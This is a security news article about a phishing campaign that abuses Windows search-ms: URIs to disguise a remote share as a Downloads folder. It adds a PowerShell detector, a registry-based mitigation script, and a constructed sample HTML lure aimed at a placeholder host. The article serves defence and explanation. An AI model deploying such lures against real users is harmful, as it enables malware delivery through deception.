Hackers are hijacking Windows Search to hit victims with malware
"Clever" but "low-volume" campaign was recently spotted hijacking Windows Search
Researchers at Trustwave SpiderLabs have discovered a cybercrime campaign that abuses the Windows search functionality to trick victims into fetching malware from an attacker-controlled server. They describe it as low in volume but “clever”.
“This technique cleverly obscures the attacker’s true intent, exploiting the trust users place in familiar interfaces and common actions like opening email attachments,” the researchers said in their write-up.
Be wary of your inbox
The attack starts with a phishing email posing as an invoice or something similar. It carries a .ZIP archive containing an HTML file; wrapping the file in an archive helps it slip past antivirus and email security products that do not inspect compressed contents.
When opened, the HTML file launches the browser and redirects it to a search-ms: URI, which hands control to Windows Explorer’s search function. Explorer is told to search for items labeled “INVOICE” in a specific location: not a local folder, but a remote server exposed through a Cloudflare tunnel. The search window is also given the display name “Downloads”, so victims believe they are looking at a file they have just downloaded rather than at the contents of a remote share.
Among the files then presented to the victim is a shortcut (.LNK) that points to a batch script (.BAT) hosted on the same server. If the victim opens the shortcut, the script runs and carries out the next stage of the attack.
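The search-ms: link that drives this chain can be spotted in an attachment before anyone opens it. The PowerShell below is an added example, not code from Trustwave’s write-up or from the campaign: it pulls search-ms: and search: URIs out of an HTML body, decodes the documented parameters (query, crumb=location:…, displayname), and flags any search whose location is a UNC path, which means the “results” are being served from a remote share. The sample HTML and the host name example-tunnel.invalid are constructed for this example.

```powershell
# Added example, not code from Trustwave's write-up or the campaign itself:
# extract search-ms:/search: URIs from an HTML attachment and decode the
# documented parameters (query, crumb=location:..., displayname). The sample
# HTML below is constructed; example-tunnel.invalid is a placeholder host.
function Get-SearchMsUri {
    param([Parameter(Mandatory)][string]$Html)

    # Decode entities first so &amp; separators and encoded quotes match.
    $text = [System.Net.WebUtility]::HtmlDecode($Html)

    foreach ($m in [regex]::Matches($text, '\bsearch(?:-ms)?:[^\s"''<>]+', 'IgnoreCase')) {
        $uri = $m.Value
        $params = @{}
        foreach ($pair in $uri.Substring($uri.IndexOf(':') + 1).Split('&')) {
            $kv = $pair -split '=', 2
            if ($kv.Count -eq 2) {
                $params[$kv[0].ToLower()] = [System.Uri]::UnescapeDataString($kv[1])
            }
        }

        # crumb=location:<path> is where Explorer actually searches.
        $location = ''
        if ($params.ContainsKey('crumb') -and $params['crumb'] -match '^location:(.*)$') {
            $location = $Matches[1]
        }

        [pscustomobject][ordered]@{
            Uri         = $uri
            Query       = $params['query']
            DisplayName = $params['displayname']   # what the victim sees in the title bar
            Location    = $location
            # A UNC location means the listed files come from a remote share,
            # whatever the display name claims.
            Remote      = $location.StartsWith('\\')
        }
    }
}

# Constructed sample: a meta refresh and a fallback link, both pointing Explorer
# at a WebDAV share behind a placeholder host while calling the window "Downloads".
$sampleHtml = @'
<html><head>
<meta http-equiv="refresh" content="0;url=search-ms:query=INVOICE&amp;crumb=location:%5C%5Cexample-tunnel.invalid%40SSL%5CDavWWWRoot&amp;displayname=Downloads">
</head><body>
<p>Opening your invoice. If nothing happens,
<a href="search:query=INVOICE&amp;crumb=location:%5C%5Cexample-tunnel.invalid%40SSL%5CDavWWWRoot&amp;displayname=Downloads">click here</a>.</p>
</body></html>
'@

Get-SearchMsUri -Html $sampleHtml | Format-List
```

Both URIs in the sample come back with Remote set to True and DisplayName “Downloads”, which is the combination worth alerting on: a remote location dressed up as a local folder. The same function can be pointed at the extracted contents of a quarantined .ZIP attachment.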
By the time the researchers started analyzing the campaign, the server had already been taken offline, so they could not retrieve the payload and cannot say what kind of malware the attackers were distributing.
To mitigate the threat, administrators can disable the search-ms: and search: URI protocol handlers by deleting their registry entries, bearing in mind that this also stops any legitimate software that relies on those handlers from launching Explorer searches.
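As an added example (not from Trustwave’s write-up, which only names the registry entries), here is one way to carry out that mitigation from an elevated PowerShell session, exporting each handler key first so the change can be reverted with reg import. The backup directory is an assumption.

```powershell
# Added example, not Trustwave's code: remove the search-ms: and search:
# protocol handlers from HKEY_CLASSES_ROOT after exporting them for rollback.
# Must run in an elevated PowerShell session; the backup directory is an
# assumption, change it to suit your environment.
function Disable-SearchProtocolHandler {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [string[]]$Scheme = @('search-ms', 'search'),
        [string]$BackupDir = (Join-Path $env:TEMP 'search-handler-backup')
    )
    New-Item -ItemType Directory -Path $BackupDir -Force | Out-Null
    foreach ($s in $Scheme) {
        $key = "Registry::HKEY_CLASSES_ROOT\$s"
        if (-not (Test-Path -Path $key)) {
            Write-Verbose "$s handler is already absent"
            continue
        }
        # reg.exe export writes a .reg file; 'reg import <file>' restores it.
        $backup = Join-Path $BackupDir "$s.reg"
        & reg.exe export "HKEY_CLASSES_ROOT\$s" $backup /y | Out-Null
        if ($LASTEXITCODE -ne 0) {
            throw "Backup of $s failed; not removing the handler"
        }
        if ($PSCmdlet.ShouldProcess($key, 'Remove protocol handler')) {
            Remove-Item -Path $key -Recurse -Force
        }
    }
}

Disable-SearchProtocolHandler -Verbose

# Verify: with the keys gone, neither scheme resolves to a handler, so a
# browser can no longer hand a search-ms: link to Explorer.
foreach ($s in 'search-ms', 'search') {
    '{0,-10} handler present: {1}' -f $s, (Test-Path -Path "Registry::HKEY_CLASSES_ROOT\$s")
}
```

Run it with -WhatIf first to see which keys would be removed. Because the change affects every application that launches search-ms: links, roll it out to a pilot group before applying it fleet-wide, and keep the exported .reg files somewhere you can find them.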
Beyond that, users should be wary of incoming emails carrying attachments: “As users continue to navigate an increasingly complex threat landscape, ongoing education, and proactive security strategies remain paramount in safeguarding against such deceptive tactics,” the researchers concluded.
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.